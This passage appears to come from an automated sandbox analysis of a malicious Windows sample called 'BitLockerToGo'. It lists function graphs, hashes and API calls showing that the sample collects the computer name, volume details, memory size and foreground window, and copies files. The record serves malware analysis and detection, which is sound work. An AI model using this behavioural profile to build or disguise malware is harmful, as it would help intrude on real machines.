                                                                                                      • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042FE7E
                                                                                                      • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042FF96
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ComputerName$FreeLibrary
                                                                                                      • String ID: _P\e
                                                                                                      • API String ID: 2243422189-4114639319
                                                                                                      • Opcode ID: 2f4f54491f6aa93243f1cf79f6d8829f01310c533aae26db0dde3773ae084428
                                                                                                      • Instruction ID: efd6f750eb95c3ff3ba8a7cdef71ee63ec0f3e4d7050a0381c3b1bc9f1318b6e
                                                                                                      • Opcode Fuzzy Hash: 2f4f54491f6aa93243f1cf79f6d8829f01310c533aae26db0dde3773ae084428
                                                                                                      • Instruction Fuzzy Hash: 5E02C870105B818EE7358F35C4A17B3BBE1AF57304F484AAED4EA8B382D739A509C765

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 863 42a4d0-42a4d4 call 42a4f0 865 42a4d9-42a4de 863->865 866 42ab90-42abeb 865->866 867 42a4e4-42a4e6 865->867 868 42abf0-42ac1a 866->868 868->868 869 42ac1c-42acc6 868->869 870 42acd0-42acf1 869->870 870->870 871 42acf3-42ad0f call 43d860 870->871 874 42ae82-42ae8b call 40c830 871->874 875 42af53-42af55 871->875 876 42af83-42afa2 call 4461b0 871->876 877 42ae90-42ae96 call 40c830 871->877 878 42ad16-42ad18 871->878 879 42af34-42af4c call 445ed0 871->879 880 42ae9f-42aea8 871->880 881 42aeaf-42af0e 871->881 882 42ae7c 871->882 883 42ad3d-42ad3f 871->883 874->877 875->876 876->874 876->875 876->877 876->878 876->879 876->880 876->881 876->882 876->883 890 42b783-42b78f 876->890 877->880 887 42ad20-42ad29 878->887 879->875 879->876 880->875 880->876 880->879 880->881 885 42af10-42af24 881->885 882->874 883->890 885->885 892 42af26-42af2e CopyFileW 885->892 887->887 894 42ad2b-42ad34 887->894 892->879 897 42ad36-42ad3b 894->897 898 42ad44 894->898 899 42ad47-42adb3 call 40c820 897->899 898->899 902 42adc0-42ae07 899->902 902->902 903 42ae09-42ae19 902->903 904 42ae41-42ae55 903->904 905 42ae1b-42ae22 903->905 907 42ae71 904->907 908 42ae57-42ae5b 904->908 906 42ae30-42ae3f 905->906 906->904 906->906 907->882 909 42ae60-42ae6f 908->909 909->907 909->909
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ('$P+P)$_p
                                                                                                      • API String ID: 0-1584404448
                                                                                                      • Opcode ID: 0d9cf72fc8347ee5fd2832af1e30783417006399e9ed0880644a954c1721fa44
                                                                                                      • Instruction ID: 6dea4c731ee9a7975b254bd24a711b3eefb102b32f57c46570b6ef4cd6a6d592
                                                                                                      • Opcode Fuzzy Hash: 0d9cf72fc8347ee5fd2832af1e30783417006399e9ed0880644a954c1721fa44
                                                                                                      • Instruction Fuzzy Hash: B7A1CBB5A09350CFE3209F25E88025BBBE1FBC6718F444A2DF4C44B291E7798909CB97

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 930 429fe0-42a00f 931 42a010-42a032 930->931 931->931 932 42a034-42a040 931->932 933 42a042-42a04a 932->933 934 42a084-42a08f 932->934 936 42a050-42a057 933->936 935 42a090-42a0cd 934->935 935->935 937 42a0cf-42a0d3 935->937 938 42a060-42a066 936->938 939 42a059-42a05c 936->939 941 42a0d9-42a109 call 43f6a0 937->941 942 42a16c-42a16e 937->942 938->934 940 42a068-42a07c call 442710 938->940 939->936 943 42a05e 939->943 947 42a081 940->947 949 42a110-42a132 941->949 944 42a4be-42a4c7 942->944 943->934 947->934 949->949 950 42a134-42a140 949->950 951 42a142-42a14f 950->951 952 42a194-42a198 950->952 955 42a150-42a157 951->955 953 42a4b5-42a4bb call 43f710 952->953 954 42a19e-42a1a4 952->954 953->944 956 42a1b0-42a1bb 954->956 957 42a173-42a17b 955->957 958 42a159-42a166 955->958 956->956 961 42a1bd-42a1e0 956->961 957->952 960 42a17d-42a18c call 442710 957->960 958->955 962 42a168-42a16a 958->962 967 42a191 960->967 965 42a1e2-42a1e7 961->965 966 42a1e9 961->966 962->952 968 42a1eb-42a1fc call 40c820 965->968 966->968 967->952 971 42a211-42a21b 968->971 972 42a200-42a20f 971->972 973 42a21d 971->973 972->971 975 42a234-42a238 972->975 974 42a220-42a230 973->974 974->974 976 42a232 974->976 977 42a4a8 975->977 978 42a23e-42a24a 975->978 976->972 981 42a4ac-42a4b2 call 40c830 977->981 979 42a29b-42a2b4 call 40c820 978->979 980 42a24c-42a255 978->980 992 42a411-42a447 979->992 993 42a2ba-42a2c0 979->993 982 42a26c-42a270 980->982 981->953 985 42a272-42a27b 982->985 986 42a260 982->986 990 42a290-42a294 985->990 991 42a27d-42a280 985->991 989 42a261-42a26a 986->989 989->979 989->982 990->989 996 42a296-42a299 990->996 991->989 995 42a450-42a47d 992->995 993->992 994 42a2c6-42a2cc 993->994 997 42a2d0-42a2da 994->997 995->995 998 42a47f-42a4a6 call 40d170 call 40c830 995->998 996->989 999 42a2f0-42a2f5 997->999 1000 42a2dc-42a2e1 997->1000 998->981 1003 42a320-42a331 999->1003 1004 42a2f7-42a2fa 999->1004 1002 42a3b0-42a3b6 1000->1002 1010 42a3b8-42a3be 1002->1010 1007 42a337-42a33a 1003->1007 1008 42a3ca-42a3d3 1003->1008 1004->1003 1006 42a2fc-42a310 1004->1006 1006->1002 1007->1008 1011 42a340-42a3a7 1007->1011 1014 42a3d5-42a3da 1008->1014 1015 42a3dc-42a3df 1008->1015 1010->992 1013 42a3c0-42a3c2 1010->1013 1011->1002 1013->997 1018 42a3c8 1013->1018 1014->1010 1016 42a3e1-42a408 1015->1016 1017 42a40a-42a40f 1015->1017 1016->1002 1017->1002 1018->992
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: /\K$C\K$cjkf$i!fY
                                                                                                      • API String ID: 2994545307-2760849073
                                                                                                      • Opcode ID: 387427b0b10bc28b99ec5eca227ed5ef1db93da8e779cc8afa3f9cf2f65a9b82
                                                                                                      • Instruction ID: 700c5670fb3c9c20f47da7c9336e4595e6374c30db57a28f2eec967bcbf2721c
                                                                                                      • Opcode Fuzzy Hash: 387427b0b10bc28b99ec5eca227ed5ef1db93da8e779cc8afa3f9cf2f65a9b82
                                                                                                      • Instruction Fuzzy Hash: EFC18B72B083208BD714DE28D84123BB7D2EB95314F58857EED8597381E679DC16838B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: C{$KH$wI
                                                                                                      • API String ID: 0-157203947
                                                                                                      • Opcode ID: 6bbccb6c3ec29a07ce4e3067424af604fe1f3197f405a8b48882e3480d3a1411
                                                                                                      • Instruction ID: 5a1d5bcfb37b6caf92971c00b67b9f2b61a6e481f430d70ebd1b0fab732dd71c
                                                                                                      • Opcode Fuzzy Hash: 6bbccb6c3ec29a07ce4e3067424af604fe1f3197f405a8b48882e3480d3a1411
                                                                                                      • Instruction Fuzzy Hash: 7BC12274608341DBD3249F64EC9076BBBE0EF86304F04893DE5C997261EB79C946CB5A
                                                                                                      APIs
                                                                                                      • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 004305BC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InstalledMemoryPhysicallySystem
                                                                                                      • String ID: -'.$
                                                                                                      • API String ID: 3960555810-2031752551
                                                                                                      • Opcode ID: 84819c11fe3172805991be54bcd6bd9f21ac9f1dfa81a224850982c9a8e8c1f1
                                                                                                      • Instruction ID: 4ac50953f9a0de550c4c4ae2e7a88b58c794244169fc653cc758ba5e71b8bb0f
                                                                                                      • Opcode Fuzzy Hash: 84819c11fe3172805991be54bcd6bd9f21ac9f1dfa81a224850982c9a8e8c1f1
                                                                                                      • Instruction Fuzzy Hash: 1DE1DB75505B818FE325CF39C4507A3FBE2AF96304F088AAEC0EA8B752D739A505CB55
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ZZcd$w%pb
                                                                                                      • API String ID: 0-2617558804
                                                                                                      • Opcode ID: fb6b9969ca16c392712c9b32b0d3b378ea7b5fcf45fd3129d860c78818b58b66
                                                                                                      • Instruction ID: 2d8657e790b194c8be43008f2260b38e5f5fbc8901ff7ca0d86f05e99f3e131e
                                                                                                      • Opcode Fuzzy Hash: fb6b9969ca16c392712c9b32b0d3b378ea7b5fcf45fd3129d860c78818b58b66
                                                                                                      • Instruction Fuzzy Hash: 6CF127B0504B818BD7358F35C4607B3FBE1AFA6304F189AAEC0D787292D778A546C769
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 2;:9$
                                                                                                      • API String ID: 0-2585926393
                                                                                                      • Opcode ID: f132422ba27ef4af5c5a84d963810ce6261f19c463f40ec551641e80f88a8d1f
                                                                                                      • Instruction ID: d049218382524de6c71eb953ebe04dd1f1d42051e67aff3c3122271904e12227
                                                                                                      • Opcode Fuzzy Hash: f132422ba27ef4af5c5a84d963810ce6261f19c463f40ec551641e80f88a8d1f
                                                                                                      • Instruction Fuzzy Hash: 999147326083108FD7288F28D89166BF7E2EBD5314F1A892EE8D55B391D775EC06C786
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-3019521637
                                                                                                      • Opcode ID: 0c19f6c4287a4481748e8b760a3038ad12b265c1c6c6600c94dc8917dc866dde
                                                                                                      • Instruction ID: 1c5520b8289ff864435fe2a69271e0aad5424931f9995e7acb6d29c3464857c0
                                                                                                      • Opcode Fuzzy Hash: 0c19f6c4287a4481748e8b760a3038ad12b265c1c6c6600c94dc8917dc866dde
                                                                                                      • Instruction Fuzzy Hash: 487117316043019BEB14EF28D951A2BB7E2EFD6754F1AC42EE8858B355EB34EC118747
                                                                                                      APIs
                                                                                                      • LdrInitializeThunk.NTDLL(004465F2,?,00000004,?,?,00000018,?), ref: 0044273E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: ad932b2b00559e9cb24108de1499e2b8809661d28f6ef4b94d1e3dfa2d030c47
                                                                                                      • Instruction ID: 88b266f08c8d8dc656098dc4a5309144cffe720ba9f358246b073a6e310c2786
                                                                                                      • Opcode Fuzzy Hash: ad932b2b00559e9cb24108de1499e2b8809661d28f6ef4b94d1e3dfa2d030c47
                                                                                                      • Instruction Fuzzy Hash: 47E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: @
                                                                                                      • API String ID: 2994545307-2766056989
                                                                                                      • Opcode ID: b620152f36f17caeb2217b7fd88a9ce65900b1491f76b837e4fb822b75d065f0
                                                                                                      • Instruction ID: 6c2a2533986f9a6c57199ddd1b071ebe688dac7b9e74ac564ce8f1a233921143
                                                                                                      • Opcode Fuzzy Hash: b620152f36f17caeb2217b7fd88a9ce65900b1491f76b837e4fb822b75d065f0
                                                                                                      • Instruction Fuzzy Hash: AF4127B09043008BE714DF28D88576BB7F0FF96318F15862EE499573A2E7799904C79B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: @
                                                                                                      • API String ID: 2994545307-2766056989
                                                                                                      • Opcode ID: 021d14861146ca7bd4796ee5291b4df173cfbf7747401b04b16f2cf082670e47
                                                                                                      • Instruction ID: cbe6ba5825563ceb8cb44401a2ad3a7ce6a2005b85b4a9f4710e4d403184df47
                                                                                                      • Opcode Fuzzy Hash: 021d14861146ca7bd4796ee5291b4df173cfbf7747401b04b16f2cf082670e47
                                                                                                      • Instruction Fuzzy Hash: 2C21F0714083009FD314DF28E88166BBBF8FF96314F15892EEA9447391D7399808CB5B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID:
                                                                                                      • API String ID: 2994545307-0
                                                                                                      • Opcode ID: 9df6522e2f1cca3957c57f98055dcbfd196edf23b173b1ec72ab5ce698d2fddc
                                                                                                      • Instruction ID: 409027c6a4c1faaf10a83b04618c38e77f36ed44be96c568a3acd16d235f34df
                                                                                                      • Opcode Fuzzy Hash: 9df6522e2f1cca3957c57f98055dcbfd196edf23b173b1ec72ab5ce698d2fddc
                                                                                                      • Instruction Fuzzy Hash: 11815A317047408BE3258F25D991BA3BBD3EB92301F58847ED4918B386C77DA806C728
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ef2965df30f234f2df1b2eb3bb3a9297b0be10da4271bf461779c0c4a9c7c652
                                                                                                      • Instruction ID: 9faf9d2ba538089567e59372a320b96e5e95850dd821da7f6d836ec4575114ba
                                                                                                      • Opcode Fuzzy Hash: ef2965df30f234f2df1b2eb3bb3a9297b0be10da4271bf461779c0c4a9c7c652
                                                                                                      • Instruction Fuzzy Hash: CA41E876804300AFE721AF11FD017BA7BE1EB9531AF58453DE4886B373E73588158B99

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 541 43d028-43d051 542 43d060-43d0bc 541->542 542->542 543 43d0be-43d146 SysAllocString 542->543 544 43d150-43d1aa 543->544 544->544 545 43d1ac-43d1e2 SysAllocString 544->545 547 43d462-43d484 SysFreeString * 2 545->547 548 43d300-43d30c 545->548 549 43d2eb-43d2ff 545->549 550 43d22a-43d28a VariantInit 545->550 551 43d1e9-43d205 545->551 552 43d449-43d460 545->552 553 43d318-43d335 545->553 559 43d30f 548->559 549->548 554 43d290-43d2d7 550->554 555 43d209-43d223 551->555 553->552 554->554 557 43d2d9-43d2e1 554->557 555->548 555->549 555->550 555->552 555->553 557->549 559->553
                                                                                                      APIs
                                                                                                      • SysAllocString.OLEAUT32(?), ref: 0043D0C3
                                                                                                      • SysAllocString.OLEAUT32(77AB79D7), ref: 0043D1B1
                                                                                                      • VariantInit.OLEAUT32(?), ref: 0043D22F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocString$InitVariant
                                                                                                      • String ID: ()
                                                                                                      • API String ID: 3074814690-1580606521
                                                                                                      • Opcode ID: cbb28492575553f69fd408189c509c55d37cf6aa771118416af5257a742d0982
                                                                                                      • Instruction ID: 19a721f75bc935f390a1e5941c53c0c159c65e9f3490a5adac5fdcf0d8ef2ec1
                                                                                                      • Opcode Fuzzy Hash: cbb28492575553f69fd408189c509c55d37cf6aa771118416af5257a742d0982
                                                                                                      • Instruction Fuzzy Hash: BB91CC76A083019FD314CF64D880A9ABBE5FFC6700F15892CE9D4AB2A5C774D906CB96

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 910 40ced0-40ceda call 441400 913 40cf43-40cf45 ExitProcess 910->913 914 40cedc-40cee3 call 439a00 910->914 917 40cee5-40cef7 914->917 918 40cf3e call 442610 914->918 920 40cf00-40cf13 917->920 918->913 920->920 921 40cf15-40cf23 GetCurrentThreadId GetForegroundWindow 920->921 922 40cf25 GetCurrentProcessId 921->922 923 40cf2b-40cf32 call 40de90 921->923 922->923 923->918 926 40cf34 call 410370 923->926 928 40cf39 call 40f480 926->928 928->918
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcess$ExitForegroundThreadWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 3118123366-0
                                                                                                      • Opcode ID: b2f7bf4193498196c65cc3eacf7fb00409c3d30f66b0170974dd11af1f518ea6
                                                                                                      • Instruction ID: 554cb3f22e5e397e520f3045255adef2d5194ae4360cf6ac652a5f5ba8e45881
                                                                                                      • Opcode Fuzzy Hash: b2f7bf4193498196c65cc3eacf7fb00409c3d30f66b0170974dd11af1f518ea6
                                                                                                      • Instruction Fuzzy Hash: 9EF0B430044141D7D7107B75654939E67515F53349F11553EE881A73D2EA3C4449C66F
                                                                                                      APIs
                                                                                                      • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 004426CC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: 5f1e7ab3bcaa4f276b89a2401268ac02ed99cb668f5fb5d6a3cbc785b5404c08
                                                                                                      • Instruction ID: bcc3a662999f866444b112037d2392ff6d773eb9dc5e8852d22e008d96859871
                                                                                                      • Opcode Fuzzy Hash: 5f1e7ab3bcaa4f276b89a2401268ac02ed99cb668f5fb5d6a3cbc785b5404c08
                                                                                                      • Instruction Fuzzy Hash: BC1157B6B083028FE3049E65ED807A7B75AFBCA305F094638E9C853642D5B9E8098695
                                                                                                      APIs
                                                                                                      • RtlFreeHeap.NTDLL(?,00000000,?), ref: 0043F76A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FreeHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 3298025750-0
                                                                                                      • Opcode ID: 1f71666df391aa4a87eabe19eb44386721a075ebcc73a53839e88d0bacf69ff8
                                                                                                      • Instruction ID: cb981006c1a3dabf183fdf115dfd7e517efd59c81eb2d647cd2f4fa60a17fa45
                                                                                                      • Opcode Fuzzy Hash: 1f71666df391aa4a87eabe19eb44386721a075ebcc73a53839e88d0bacf69ff8
                                                                                                      • Instruction Fuzzy Hash: 96F027746063509FE7085B78ACA1A3B7BD4EF66315F24053DE582936A1C6259C21CA86
                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(?,00000000,?,00000000,?,?,004426DA), ref: 0043F6ED
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: 2a015b1a2f3e4e192720d3afb3866816aa8325f49e4ee1bd60682941cefd4451
                                                                                                      • Instruction ID: 8cba3ba56d7e1352ab413d5837bc702c3c4840c278b3d095aa1a88c3d8300856
                                                                                                      • Opcode Fuzzy Hash: 2a015b1a2f3e4e192720d3afb3866816aa8325f49e4ee1bd60682941cefd4451
                                                                                                      • Instruction Fuzzy Hash: 80F0E5706883849FD3189F20CC91FBB7B95EB99354F240D7CE59587BA3C2694C01CB85
                                                                                                      APIs
                                                                                                      • GetForegroundWindow.USER32 ref: 00442CC0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ForegroundWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2020703349-0
                                                                                                      • Opcode ID: a1b4fe6646263eb80f424139902ef8b91870b46172e1dd2cba4177293bab01fd
                                                                                                      • Instruction ID: f92112bc817934ae3091856df302bd1e7a1d1d6f05b5523c1bad46fc826dbb57
                                                                                                      • Opcode Fuzzy Hash: a1b4fe6646263eb80f424139902ef8b91870b46172e1dd2cba4177293bab01fd
                                                                                                      • Instruction Fuzzy Hash: F7F020BAA082418FEB018F38E89256A77A0FB17315B08083AE152C7292C2789482CF09
                                                                                                      APIs
                                                                                                      • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043D5DC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InformationVolume
                                                                                                      • String ID:
                                                                                                      • API String ID: 2039140958-0
                                                                                                      • Opcode ID: 825e4bb11b892ec0d1815982e77ff3a41e0a0fdf7e774b37ef02c67ee175b479
                                                                                                      • Instruction ID: 646c41fa352a87fdcbe1464ad9b18e82e351b1e297e627df2111d947e0c21c35
                                                                                                      • Opcode Fuzzy Hash: 825e4bb11b892ec0d1815982e77ff3a41e0a0fdf7e774b37ef02c67ee175b479
                                                                                                      • Instruction Fuzzy Hash: 67E06734BC030176F5322B216D03F3A2A169B52F6BF300165BB483C1E3A6D57699D56D
                                                                                                      APIs
                                                                                                      • GetForegroundWindow.USER32 ref: 00442CC0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ForegroundWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2020703349-0
                                                                                                      • Opcode ID: e880c25df91c2ca0575f44f77806ee1b54c78b022a0c841fc851684192607cda
                                                                                                      • Instruction ID: 5a497ba80e89411dd4e8141d1dbb84b2c3ca3211f85337ebb7c9ba1eeb67a141
                                                                                                      • Opcode Fuzzy Hash: e880c25df91c2ca0575f44f77806ee1b54c78b022a0c841fc851684192607cda
                                                                                                      • Instruction Fuzzy Hash: 93E0127A905600DFDB14DF54F89146873B0FB0931AB54042AE542D3352C634A951CF5A
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: BlanketProxy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3890896728-0
                                                                                                      • Opcode ID: 55b539834acdcc0c5bb71a397335d67283f0d8037f15eabc95923ace176a2385
                                                                                                      • Instruction ID: fe09de938e917814381b934cabb4eee728d2edb2d0c991108fda0c89255ec741
                                                                                                      • Opcode Fuzzy Hash: 55b539834acdcc0c5bb71a397335d67283f0d8037f15eabc95923ace176a2385
                                                                                                      • Instruction Fuzzy Hash: D8F02EB4109701CFE311DF25D1A871ABBF0FB85308F10895CE5958B360C7769959CF82
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: BlanketProxy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3890896728-0
                                                                                                      • Opcode ID: 9f1b4d2b18b046abd3f3ecac286f8308bfe36a7d75397ff7b73e06c54f1cd8d6
                                                                                                      • Instruction ID: a1a64b36332589802b6460eb5d31805cc55d2de3cd8c9222a3aa3bcbfdcd9d92
                                                                                                      • Opcode Fuzzy Hash: 9f1b4d2b18b046abd3f3ecac286f8308bfe36a7d75397ff7b73e06c54f1cd8d6
                                                                                                      • Instruction Fuzzy Hash: 80F04EB410C341DFE325DF14C1A875BBBE4BB85308F10890CE4984B290C7BA9A498F83
                                                                                                      APIs
                                                                                                      • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043D5DC
                                                                                                      Memory Dump Source
